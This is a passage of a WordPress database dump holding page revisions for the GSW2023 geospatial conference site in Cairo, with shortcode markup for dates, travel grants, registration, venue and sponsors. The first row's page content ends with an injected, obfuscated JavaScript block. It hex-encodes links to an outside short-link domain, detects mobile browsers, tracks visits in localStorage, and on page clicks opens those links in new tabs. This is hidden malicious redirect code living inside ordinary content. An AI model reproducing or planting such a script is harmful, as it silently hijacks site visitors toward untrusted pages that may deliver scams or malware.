css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"35\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317489572{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 13:37:40','2023-06-09 13:37:40','',3066,'https://gsw2023.com/?p=4641',0,'revision','',0),
(4642,1,'2023-06-09 13:39:02','2023-06-09 13:39:02','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" 